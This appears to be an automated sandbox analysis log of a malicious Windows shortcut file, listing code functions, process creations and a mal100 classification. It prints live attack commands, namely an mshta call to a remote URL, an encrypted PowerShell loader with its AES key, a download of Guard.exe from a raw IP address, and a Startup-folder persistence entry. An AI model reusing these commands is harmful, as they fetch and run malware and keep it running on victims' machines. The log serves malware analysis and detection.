Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E9529C11_2_00007FF7C0E9529C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E5B39011_2_00007FF7C0E5B390
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E895B011_2_00007FF7C0E895B0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EE56A011_2_00007FF7C0EE56A0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0F017C011_2_00007FF7C0F017C0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E8175011_2_00007FF7C0E81750
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E658D011_2_00007FF7C0E658D0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E7F8D011_2_00007FF7C0E7F8D0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ECD87C11_2_00007FF7C0ECD87C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E5183C11_2_00007FF7C0E5183C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E9184011_2_00007FF7C0E91840
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EFBA0C11_2_00007FF7C0EFBA0C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E5B9F011_2_00007FF7C0E5B9F0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E8793C11_2_00007FF7C0E8793C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E6FA4F11_2_00007FF7C0E6FA4F
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ED1A1811_2_00007FF7C0ED1A18
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EFDB1811_2_00007FF7C0EFDB18
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E63C2011_2_00007FF7C0E63C20
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E7BEB411_2_00007FF7C0E7BEB4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E5BE7011_2_00007FF7C0E5BE70
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E55F3C11_2_00007FF7C0E55F3C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EE206C11_2_00007FF7C0EE206C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FF84867091E18_2_00007FF84867091E
Source: C:\Users\Public\Guard.exeCode function: 20_2_006BB02020_2_006BB020
Source: C:\Users\Public\Guard.exeCode function: 20_2_006B94E020_2_006B94E0
Source: C:\Users\Public\Guard.exeCode function: 20_2_006B9C8020_2_006B9C80
Source: C:\Users\Public\Guard.exeCode function: 20_2_006D23F520_2_006D23F5
Source: C:\Users\Public\Guard.exeCode function: 20_2_0073840020_2_00738400
Source: C:\Users\Public\Guard.exeCode function: 20_2_006E650220_2_006E6502
Source: C:\Users\Public\Guard.exeCode function: 20_2_006E265E20_2_006E265E
Source: C:\Users\Public\Guard.exeCode function: 20_2_006BE6F020_2_006BE6F0
Source: C:\Users\Public\Guard.exeCode function: 20_2_006D282A20_2_006D282A
Source: C:\Users\Public\Guard.exeCode function: 20_2_006E89BF20_2_006E89BF
Source: C:\Users\Public\Guard.exeCode function: 20_2_006E6A7420_2_006E6A74
Source: C:\Users\Public\Guard.exeCode function: 20_2_00730A3A20_2_00730A3A
Source: C:\Users\Public\Guard.exeCode function: 20_2_006DCD5120_2_006DCD51
Source: C:\Users\Public\Guard.exeCode function: 20_2_0070EDB220_2_0070EDB2
Source: C:\Users\Public\Guard.exeCode function: 20_2_00718E4420_2_00718E44
Source: C:\Users\Public\Guard.exeCode function: 20_2_00730EB720_2_00730EB7
Source: C:\Users\Public\Guard.exeCode function: 20_2_006E6FE620_2_006E6FE6
Source: C:\Users\Public\Guard.exeCode function: 20_2_006D33B720_2_006D33B7
Source: C:\Users\Public\Guard.exeCode function: 20_2_006CD45D20_2_006CD45D
Source: C:\Users\Public\Guard.exeCode function: 20_2_006DF40920_2_006DF409
Source: C:\Users\Public\Guard.exeCode function: 20_2_006B166320_2_006B1663
Source: C:\Users\Public\Guard.exeCode function: 20_2_006CF62820_2_006CF628
Source: C:\Users\Public\Guard.exeCode function: 20_2_006BF6A020_2_006BF6A0
Source: C:\Users\Public\Guard.exeCode function: 20_2_006D16B420_2_006D16B4
Source: C:\Users\Public\Guard.exeCode function: 20_2_006D78C320_2_006D78C3
Source: C:\Users\Public\Guard.exeCode function: 20_2_006D1BA820_2_006D1BA8
Source: C:\Users\Public\Guard.exeCode function: 20_2_006DDBA520_2_006DDBA5
Source: C:\Users\Public\Guard.exeCode function: 20_2_006E9CE520_2_006E9CE5
Source: C:\Users\Public\Guard.exeCode function: 20_2_006CDD2820_2_006CDD28
Source: C:\Users\Public\Guard.exeCode function: 20_2_006D1FC020_2_006D1FC0
Source: C:\Users\Public\Guard.exeCode function: 20_2_006DBFD620_2_006DBFD6
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_0029B02024_2_0029B020
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002994E024_2_002994E0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00299C8024_2_00299C80
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002B23F524_2_002B23F5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_0031840024_2_00318400
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002C650224_2_002C6502
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002C265E24_2_002C265E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_0029E6F024_2_0029E6F0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002B282A24_2_002B282A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002C89BF24_2_002C89BF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00310A3A24_2_00310A3A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002C6A7424_2_002C6A74
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002BCD5124_2_002BCD51
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002EEDB224_2_002EEDB2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002F8E4424_2_002F8E44
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00310EB724_2_00310EB7
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002C6FE624_2_002C6FE6
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002B33B724_2_002B33B7
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002BF40924_2_002BF409
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002AD45D24_2_002AD45D
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002AF62824_2_002AF628
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_0029166324_2_00291663
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_0029F6A024_2_0029F6A0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002B16B424_2_002B16B4
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002B78C324_2_002B78C3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002B1BA824_2_002B1BA8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002BDBA524_2_002BDBA5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002C9CE524_2_002C9CE5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002ADD2824_2_002ADD28
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002B1FC024_2_002B1FC0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002BBFD624_2_002BBFD6
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Guard.exe D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: String function: 00007FF7C0E78D58 appears 76 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 002A1A36 appears 34 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 002B8B30 appears 42 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 002B0D17 appears 70 times
Source: C:\Users\Public\Guard.exeCode function: String function: 006D0D17 appears 70 times
Source: C:\Users\Public\Guard.exeCode function: String function: 006C1A36 appears 34 times
Source: C:\Users\Public\Guard.exeCode function: String function: 006D8B30 appears 42 times
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 3023
Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 3023Jump to behavior
Source: Process Memory Space: powershell.exe PID: 4308, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal100.expl.evad.winLNK@41/73@4/3
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ED3778 GetLastError,FormatMessageW,11_2_00007FF7C0ED3778
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EBCCE0 AdjustTokenPrivileges,CloseHandle,11_2_00007FF7C0EBCCE0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EBD5CC LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_00007FF7C0EBD5CC
Source: C:\Users\Public\Guard.exeCode function: 20_2_00708DE9 AdjustTokenPrivileges,CloseHandle,20_2_00708DE9
Source: C:\Users\Public\Guard.exeCode function: 20_2_00709399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,20_2_00709399
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002E8DE9 AdjustTokenPrivileges,CloseHandle,24_2_002E8DE9
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002E9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,24_2_002E9399
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ED57B0 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,11_2_00007FF7C0ED57B0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EEEB34 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,11_2_00007FF7C0EEEB34
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ED83D4 CoInitialize,SHGetSpecialFolderLocation,SHGetDesktopFolder,CoCreateInstance,SHCreateShellItem,CoTaskMemFree,SHBrowseForFolderW,SHGetPathFromIDListW,CoTaskMemFree,CoTaskMemFree,CoUninitialize,11_2_00007FF7C0ED83D4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E56580 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,11_2_00007FF7C0E56580
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7492:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7836:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xru3i0gj.fdn.ps1Jump to behavior
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\forfiles.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: duyba.lnk.download.lnkVirustotal: Detection: 20%
Source: duyba.lnk.download.lnkReversingLabs: Detection: 15%
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/ghep2
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . \*i*\*2\msh*e https://tiffany-careers.com/ghep2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/ghep2
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($RptYb){return -split ($RptYb -replace '..', '0x$& ')};$TmDJyn = clean('85EF51FEE837F812F61F1656D38BD83A6C01DC072CBCF246D841948987B9BF3C9407C4F8ABE6B3AC5C50C036D5BF68E3CA56C456FB1B2404AC5CC6C48224E43EFF1648E7AF29CE17BF2F62A8A7C7F4DE07613F737B271AA100A67B779C122AD966C15CB3C823908B36BCCBE9B592D037365125E56312B004E07F513AA459ACF6BFEB51AC31152191AF94E56667A3D2A99C72466ED1996C430D4FDBDAAC444A645133FFD6F506740CE6AE51237562A4307EAF56A5E569B87DC171D550AD8A419C8822B7E0E8357121B4EE75DD16DB89B145D82B1C909ABECFAF2CA7275A13D2BF9E37AD98257B106D88D6988DB290C39C801B5ACD6E2249F2E178FCF16B59452E1DF6068D3A31595646428A980314EE83988BEB6E930DAD4F3640861D45D0A054E18C6A6A1DC88EC8B63FC99EA26D553E7BB5359CA978A904B26D285DA2E961D2C21E99F57B1C7F312913323B86FA89527AF31A5917C2DA9F587D7AD9CE91B6BF628678DF96FAE7AC81A58B57440B8A9E5A64E9BA96EB65240C98299F091495E74DF32B68B79275E2937AB69BF3BD5F0EC1E9A16BF58DA85A870C384779CDAD74B0CCBA5DB9AC7C88E57A05E5FB4B20E10C6C366F1EB3C39148D6FD619830E132F469D25D555A553DD869B43849F23E017958E14F9380CFE36FC613F285B96CA940C562F0BBE8C241411E58D012E23CE1C600E9337A739DB5AE1933D65A4E4AF946B7B1F6CF268BD58702C1B7772610043D981C68C31564F5D9BCBC8CD96ECCFFEEA53D365D01D36E4B3484C95363DD6F39138A67AA362CC9C4190026ABF641C6DF0E5D4A3DE01E05606278D5D2CD0D85DC89F086FAFB7491F9C40F89ED33F7D31C9484F5A8801EF1BABD7938BE509E2133642C8F35CA6BC2E09BEBD5D6E25F0DC30937B429ECB2F268B5D43052547BFA5B9ED413A38A20627D472EFB0F8E5508505831BA8934BFEEB8AE9A4BF2628245B5EC010BF6D308960A15DD28CFFB2D4FDABA50ADBE760CF86DACFCC1CC10A16D02B0C2946FCEDF74A822836F4B0F4975FF46B0CBA3CB495C20FC2E2D372C357A0897500BE09B0F824AA768EAFC28D39243CF341DE1E2A07E5CBD4B0252080E82D760C61806F6F7994A7DE1DCAB9D55F435A87A935C06EC1E878265F121BBA0C1C3B138C1C358E3620FE1A9D778846E6E0CC25C2E6EF13359D6033DE5B1EE13790F98BE7CD35C3B754897DB4583B2B846BCD4E1906C8F2416336E8F269DA57FC2A9824FD6457D1FBC840D50A0EBE6EA5D36FCDCAEB24318E174CC5E33792642277DCC1EBD38F0C1E9233BA2B6E85C963CD7EA29A78A0D2F2F3C1C85EEA9CB646881CEB314F342ECD05D23D5A754721D804D2562F5FDA471331489B61431D4EB09A03B9EF4D7FB5B3E8091B05427A6364A5B6D0281A41D08DF8F77CE3D19BBEDA721A10EB0619CC5BD0A356D2E124CD2962CE26B9E426500BC09F540E75EBD01524B2439910F6000364849B4B849A10268817BBDBE676C5F3DC1D39FA1F1A09760E6B0902B7C52C8F09DE7BF7015A029559284A573439130DC0912C8C12F8AFD9D26F921AF247BD1AFFBD37E1985F8D2709B4CE2681126C3BE8125DB7B0AB4C0CF4566221DEE6A82BC22EC143820A60C9066D3FDD32C6A78427A2E86463B2B6FFB7F128E906DB4659BDD9607349255B9A7F5362978B75C4A3D8234B1A87F09B3550450D25B8CC317C18849409DC37399F4E365EF0404E3CFE1AB8DBD8A85A9FF698337D674B0E24EFFA058A278F5943622');$MuOQabMc = [System.Security.Cryptography.Aes]::Create();$MuOQabMc.Key = clean('756561544973656A645A7544464B6A70');$MuOQabMc.IV = New-Object byte[] 16;$LaiuJGbhf = $MuOQabMc.CreateDecryptor();$mGnVsuDWp = [Text.Encoding]::UTF8.GetString($LaiuJGbhf.TransformFinalBlock
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Marketing.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1744,i,5196948583256038124,6281931824865784808,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\PefjSkkhb.exe "C:\Users\user\AppData\Roaming\PefjSkkhb.exe"
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . \*i*\*2\msh*e https://tiffany-careers.com/ghep2Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/ghep2Jump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($RptYb){return -split ($RptYb -replace '..', '0x$& ')};$TmDJyn = clean('85EF51FEE837F812F61F1656D38BD83A6C01DC072CBCF246D841948987B9BF3C9407C4F8ABE6B3AC5C50C036D5BF68E3CA56C456FB1B2404AC5CC6C48224E43EFF1648E7AF29CE17BF2F62A8A7C7F4DE07613F737B271AA100A67B779C122AD966C15CB3C823908B36BCCBE9B592D037365125E56312B004E07F513AA459ACF6BFEB51AC31152191AF94E56667A3D2A99C72466ED1996C430D4FDBDAAC444A645133FFD6F506740CE6AE51237562A4307EAF56A5E569B87DC171D550AD8A419C8822B7E0E8357121B4EE75DD16DB89B145D82B1C909ABECFAF2CA7275A13D2BF9E37AD98257B106D88D6988DB290C39C801B5ACD6E2249F2E178FCF16B59452E1DF6068D3A31595646428A980314EE83988BEB6E930DAD4F3640861D45D0A054E18C6A6A1DC88EC8B63FC99EA26D553E7BB5359CA978A904B26D285DA2E961D2C21E99F57B1C7F312913323B86FA89527AF31A5917C2DA9F587D7AD9CE91B6BF628678DF96FAE7AC81A58B57440B8A9E5A64E9BA96EB65240C98299F091495E74DF32B68B79275E2937AB69BF3BD5F0EC1E9A16BF58DA85A870C384779CDAD74B0CCBA5DB9AC7C88E57A05E5FB4B20E10C6C366F1EB3C39148D6FD619830E132F469D25D555A553DD869B43849F23E017958E14F9380CFE36FC613F285B96CA940C562F0BBE8C241411E58D012E23CE1C600E9337A739DB5AE1933D65A4E4AF946B7B1F6CF268BD58702C1B7772610043D981C68C31564F5D9BCBC8CD96ECCFFEEA53D365D01D36E4B3484C95363DD6F39138A67AA362CC9C4190026ABF641C6DF0E5D4A3DE01E05606278D5D2CD0D85DC89F086FAFB7491F9C40F89ED33F7D31C9484F5A8801EF1BABD7938BE509E2133642C8F35CA6BC2E09BEBD5D6E25F0DC30937B429ECB2F268B5D43052547BFA5B9ED413A38A20627D472EFB0F8E5508505831BA8934BFEEB8AE9A4BF2628245B5EC010BF6D308960A15DD28CFFB2D4FDABA50ADBE760CF86DACFCC1CC10A16D02B0C2946FCEDF74A822836F4B0F4975FF46B0CBA3CB495C20FC2E2D372C357A0897500BE09B0F824AA768EAFC28D39243CF341DE1E2A07E5CBD4B0252080E82D760C61806F6F7994A7DE1DCAB9D55F435A87A935C06EC1E878265F121BBA0C1C3B138C1C358E3620FE1A9D778846E6E0CC25C2E6EF13359D6033DE5B1EE13790F98BE7CD35C3B754897DB4583B2B846BCD4E1906C8F2416336E8F269DA57FC2A9824FD6457D1FBC840D50A0EBE6EA5D36FCDCAEB24318E174CC5E33792642277DCC1EBD38F0C1E9233BA2B6E85C963CD7EA29A78A0D2F2F3C1C85EEA9CB646881CEB314F342ECD05D23D5A754721D804D2562F5FDA471331489B61431D4EB09A03B9EF4D7FB5B3E8091B05427A6364A5B6D0281A41D08DF8F77CE3D19BBEDA721A10EB0619CC5BD0A356D2E124CD2962CE26B9E426500BC09F540E75EBD01524B2439910F6000364849B4B849A10268817BBDBE676C5F3DC1D39FA1F1A09760E6B0902B7C52C8F09DE7BF7015A029559284A573439130DC0912C8C12F8AFD9D26F921AF247BD1AFFBD37E1985F8D2709B4CE2681126C3BE8125DB7B0AB4C0CF4566221DEE6A82BC22EC143820A60C9066D3FDD32C6A78427A2E86463B2B6FFB7F128E906DB4659BDD9607349255B9A7F5362978B75C4A3D8234B1A87F09B3550450D25B8CC317C18849409DC37399F4E365EF0404E3CFE1AB8DBD8A85A9FF698337D674B0E24EFFA058A278F5943622');$MuOQabMc = [System.Security.Cryptography.Aes]::Create();$MuOQabMc.Key = clean('756561544973656A645A7544464B6A70');$MuOQabMc.IV = New-Object byte[] 16;$LaiuJGbhf = $MuOQabMc.CreateDecryptor();$mGnVsuDWp = [Text.Encoding]::UTF8.GetString($LaiuJGbhf.TransformFinalBlockJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Marketing.pdf"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\PefjSkkhb.exe "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1744,i,5196948583256038124,6281931824865784808,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
